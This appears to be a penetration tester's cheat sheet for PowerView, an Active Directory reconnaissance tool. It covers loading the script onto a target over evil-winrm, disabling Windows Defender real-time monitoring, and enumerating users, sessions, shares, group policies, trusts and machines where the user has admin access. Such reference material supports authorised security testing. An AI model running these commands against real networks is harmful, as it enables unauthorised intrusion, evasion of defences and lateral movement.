Power View

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows “net *” commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality. Several functions for the enumeration and abuse of domain trusts also exist .

#Download script

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

#Kali default location : /usr/share/windows-resources/powersploit/Recon/PowerView.ps1

#Exfil to target --> see "File transfers" section in "Exploitation" node.

As an alternative, cp to current directory and load through evil-winrm.

cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .

evil-winrm -i 10.10.10.10 -u redcliff -p "password123" -s .

#Import module --> Import-Module .\PowerView.ps1

#Disable protection if needed

Set-MpPreference -DisableRealtimeMonitoring $true

#Enumerate Domain

#Get Current Domain: 
Get-NetDomain

#Enum Other Domains: 
Get-NetDomain -Domain <DomainName>

#Get Domain SID: 
Get-DomainSID

#Get Domain Policy: 
Get-DomainPolicy

#Will show us the policy configurations of the Domain about system access or kerberos
(Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"

#Get Domain Controlers:
Get-NetDomainController
Get-NetDomainController -Domain <DomainName>

#Enumerate Domain Users:
Get-NetUser
Get-NetUser -SamAccountName <user> 
Get-NetUser | select cn
Get-UserProperty

#Check last password change
Get-UserProperty -Properties pwdlastset

#Get a spesific "string" on a user's attribute
Find-UserField -SearchField Description -SearchTerm "redcliff"

#Enumerate user logged on a machine
Get-NetLoggedon -ComputerName <ComputerName>

#Enumerate Session Information for a machine
Get-NetSession -ComputerName <ComputerName>

#Enumerate domain machines of the current/specified domain where specific users are logged into
Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName

#Enumerate Domain Computers

Get-NetComputer -FullData
Get-DomainGroup

#Enumerate Live machines 
Get-NetComputer -Ping

#Enumerate Groups and Group members

Get-NetGroupMember -GroupName "<GroupName>" -Domain <DomainName>

#Enumerate the members of a specified group of the domain

Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty Member

#Returns all GPOs in a domain that modify local group memberships through Restricted 
#Groups or Group Policy Preferences\\

Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName

#Enumerate Shares

#Enumerate Domain Shares
Find-DomainShare

#Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess

#Enumerate Group policies

Get-NetGPO

# Shows active Policy on specified machine
Get-NetGPO -ComputerName <Name of the PC>
Get-NetGPOGroup

#Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName <ComputerName>

#Enumerate Domain Trust

Get-NetDomainTrust
Get-NetDomainTrust -Domain <DomainName>

#Enumerate Forest trust

Get-NetForestDomain
Get-NetForestDomain Forest <ForestName>

#Domains of Forest Enumeration
Get-NetForestDomain
Get-NetForestDomain Forest <ForestName>

#Map the Trust of the Forest
Get-NetForestTrust
Get-NetDomainTrust -Forest <ForestName>

#Hunting for Users

#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose

#Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -Verbose

#Find computers were a Domain Admin OR a spesified user has a session
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth

#Confirming admin access:
Invoke-UserHunter -CheckAccess

PreviousADRecon.ps1NextManual Enum basics

Last updated